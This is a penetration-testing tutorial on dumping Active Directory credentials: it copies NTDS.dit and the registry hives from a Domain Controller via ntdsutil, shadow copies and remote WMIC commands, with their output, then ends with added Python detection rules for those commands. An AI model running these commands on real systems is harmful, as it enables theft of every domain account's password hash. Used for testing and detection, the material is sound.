Obtaining Domain Controller Password Hashes

I have referred to the following bookmarked URL in the past as a reminder of how to easily obtain NTDS.dit and the SYSTEM registry hive for analysis.
Obtaining NTDS.Dit Using In-Built Windows Commands
https://www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
In this post I revisit that URL and document additional ways to obtain NTDS.dit and the Windows registry files, as well as how to extract the password hashes. Additional methods of obtaining the password hashes from the Domain Controller will also be listed.

One item I would change about the commands provided is to combine them into one long command:

C:\>ntdsutil "activate instance ntds" ifm "create full c:\temp" quit quit

This would place a backup of the NTDS.dit and the SYSTEM and SECURITY registry files in C:\temp\Active Directory and C:\temp\registry.

From this bookmark I will document all the ways I have obtained the password hashes from a Domain Controller.
More ntdsutil
You can use ntdsutil to determine if there has been a previous snapshot created. If a snapshot exists then the shadow volume can be mounted and the NTDS.dit and registry files copied.

C:\Users\Administrator>ntdsutil snapshot "list all"
ntdsutil: snapshot
snapshot: list all
 1: 2019/01/02:21:40 {ff29f1b4-5dac-41cd-a592-10c553595a95}
 2:   C: {29e45139-0e71-47eb-a48f-2e6848d05908}

Let's query the registry to identify where NTDS.dit is located, then mount the snapshot and copy NTDS.dit and the system's registry files.

C:\Users\Administrator>reg query hklm\system\currentcontrolset\services\ntds\parameters

HKEY_LOCAL_MACHINE\system\currentcontrolset\services\ntds\parameters
. . . SNIP . . .
Name,CN=Sites,CN=Configuration,DC=corp,DC=jedge,DC=com
    DsaOptions    REG_SZ    1
    DSA Working Directory    REG_SZ    C:\Windows\NTDS
    DSA Database file    REG_SZ    C:\Windows\NTDS\ntds.dit
    Database backup path    REG_SZ    C:\Windows\NTDS\dsadata.bak
. . . SNIP . . .

C:\Users\Administrator>ntdsutil snapshot "mount {29e45139-0e71-47eb-a48f-2e6848d05908}"
ntdsutil: snapshot
snapshot: mount {29e45139-0e71-47eb-a48f-2e6848d05908}
Snapshot {29e45139-0e71-47eb-a48f-2e6848d05908} mounted as C:\$SNAP_201901022140_VOLUMEC$\

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\NTDS\ntds.dit c:\temp\ntds.dit
        1 file(s) copied.

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\System32\Config\SYSTEM c:\temp\SYSTEM
        1 file(s) copied.

C:\Users\Administrator>copy C:\$SNAP_201901022140_VOLUMEC$\Windows\System32\Config\SECURITY c:\temp\SECURITY
        1 file(s) copied.

VSSADMIN over WMIC

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/vssadmin
https://docs.microsoft.com/en-us/windows/desktop/wmisdk/wmic
We will need to read the output of the WMIC commands and access the files we copy from the shadow volume, so we map the Domain Controller's C$ share and create a temp folder.

C:\Users\Administrator>net use \\192.168.50.10\C$ "Password5" /u:CORP\administrator
The command completed successfully.

C:\Users\Administrator>mkdir \\192.168.50.10\C$\temp
A subdirectory or file \\192.168.50.10\C$\temp already exists.

We use the WMIC command to identify any existing shadow volumes, or create our own, so we can copy the NTDS.dit and registry files to the temp folder, from where we can transfer them to our workstation.

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c vssadmin list shadows 2>&1 > C:\temp\checkshadow.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2568;
        ReturnValue = 0;
};

C:\Users\Administrator>type \\192.168.50.10\C$\temp\checkshadow.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Contents of shadow copy set ID: {ff29f1b4-5dac-41cd-a592-10c553595a95}
   Contained 1 shadow copies at creation time: 1/2/2019 9:40:13 PM
      Shadow Copy ID: {29e45139-0e71-47eb-a48f-2e6848d05908}
         Original Volume: (C:)\\?\Volume{874968c4-ed3a-11e6-bee8-806e6f6e6963}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: WIN-PJ59SLGOBUG.corp.jedge.com
         Service Machine: WIN-PJ59SLGOBUG.corp.jedge.com
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ApplicationRollback
         Attributes: Persistent, No auto release, Differential, Exposed locally, Auto recovered

We have a recent shadow copy. If we did not have one, we would use vssadmin to create one.

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 2564;
        ReturnValue = 0;
};

C:\Users\Administrator>type \\192.168.50.10\C$\temp\output.txt
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2005 Microsoft Corp.

Successfully created shadow copy for 'C:\'
    Shadow Copy ID: {3a6b62ff-3e5c-4b86-868c-2e26355d490a}
    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2

We will work with the shadow volume we just created. We copy the files to the C:\temp folder, which we have already mounted on the attacking host. From there we can copy them to the host for analysis.

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1248;
        ReturnValue = 0;
};

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY C:\temp\SECURITY.hive 2>&1 > C:\temp\output.txt"
Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 232;
        ReturnValue = 0;
};

C:\Users\Administrator>wmic /node:192.168.50.10 /user:CORP\Administrator /password:Password5 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy45\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit 2>&1 > C:\temp\output.txt"

Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 1804;
        ReturnValue = 0;
};

C:\Users\Administrator>dir \\192.168.50.10\C$\temp
 Volume in drive \\192.168.50.10\C$ has no label.
 Volume Serial Number is 54AC-A84F

 Directory of \\192.168.50.10\C$\temp

01/07/2019  02:15 PM    <DIR>          .
01/07/2019  02:15 PM    <DIR>          ..
01/07/2019  01:57 PM               801 checkshadow.txt
01/02/2019  09:40 PM        16,793,600 ntds.dit
01/07/2019  02:14 PM                44 output.txt
01/03/2019  05:56 PM           262,144 SECURITY.hive
01/07/2019  02:05 PM         8,650,752 SYSTEM.hive
               5 File(s)     25,707,341 bytes
               2 Dir(s)  12,779,933,696 bytes free
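
The commands in both sections above leave recognisable process-creation command lines on the Domain Controller. The following added example (not code from the original post) matches them in events shaped like Windows Security Event ID 4688 with command-line auditing or Sysmon Event ID 1. The field names, rule labels, severity scheme and sample events are assumptions constructed from the commands on this page.

```python
import re

# "parent"/"cmdline" field names and rule labels are assumptions of this example.
RULES = [
    ("ntdsutil_ifm", re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\b", re.I)),
    ("ntdsutil_snapshot",
     re.compile(r"\bntdsutil(\.exe)?\b.*\bsnapshot\b.*\b(mount|list all|create)\b", re.I)),
    ("vssadmin_shadow",
     re.compile(r"\bvssadmin(\.exe)?\s+(create\s+shadow|list\s+shadows)\b", re.I)),
    # "copy" is a cmd built-in: this fires only when it is wrapped in a new process
    # ("cmd /c copy ..."), e.g. via WMI process creation, not for an interactive copy.
    ("shadow_copy_read",
     re.compile(r"(HarddiskVolumeShadowCopy\d+|\$SNAP_\d+_VOLUME\w\$)\\windows\\"
                r"(ntds\\ntds\.dit|system32\\config\\(SYSTEM|SECURITY))\b", re.I)),
]

def classify(event):
    """Return the sorted rule labels hit by one process-creation event."""
    hits = {name for name, rx in RULES if rx.search(event["cmdline"])}
    # Processes started through Win32_Process.Create run under WmiPrvSE.exe.
    if event.get("parent", "").lower().endswith("wmiprvse.exe"):
        hits.add("wmi_spawned")
    return sorted(hits)

def triage(events):
    """Keep events that hit a content rule; WMI parentage alone is not alerted."""
    alerts = []
    for ev in events:
        hits = classify(ev)
        if any(h != "wmi_spawned" for h in hits):
            high = "wmi_spawned" in hits or "shadow_copy_read" in hits
            alerts.append(("high" if high else "medium", hits, ev["cmdline"]))
    return alerts

CMD, WMI = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WmiPrvSE.exe"
# Constructed events: command lines taken from this page plus two benign ones.
SAMPLE_EVENTS = [
    {"parent": CMD, "cmdline": r'ntdsutil "activate instance ntds" ifm "create full c:\temp" quit quit'},
    {"parent": CMD, "cmdline": r'ntdsutil snapshot "mount {29e45139-0e71-47eb-a48f-2e6848d05908}"'},
    {"parent": WMI, "cmdline": r"cmd /c vssadmin create shadow /for=C: 2>&1 > C:\temp\output.txt"},
    {"parent": WMI, "cmdline": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2"
                               r"\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive"},
    {"parent": WMI, "cmdline": r"cmd /c ipconfig /all"},
    {"parent": CMD, "cmdline": r"notepad.exe C:\temp\notes.txt"},
]

if __name__ == "__main__":
    for severity, hits, cmdline in triage(SAMPLE_EVENTS):
        print(f"{severity:6} {','.join(hits):32} {cmdline}")
```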

to be continued . . .
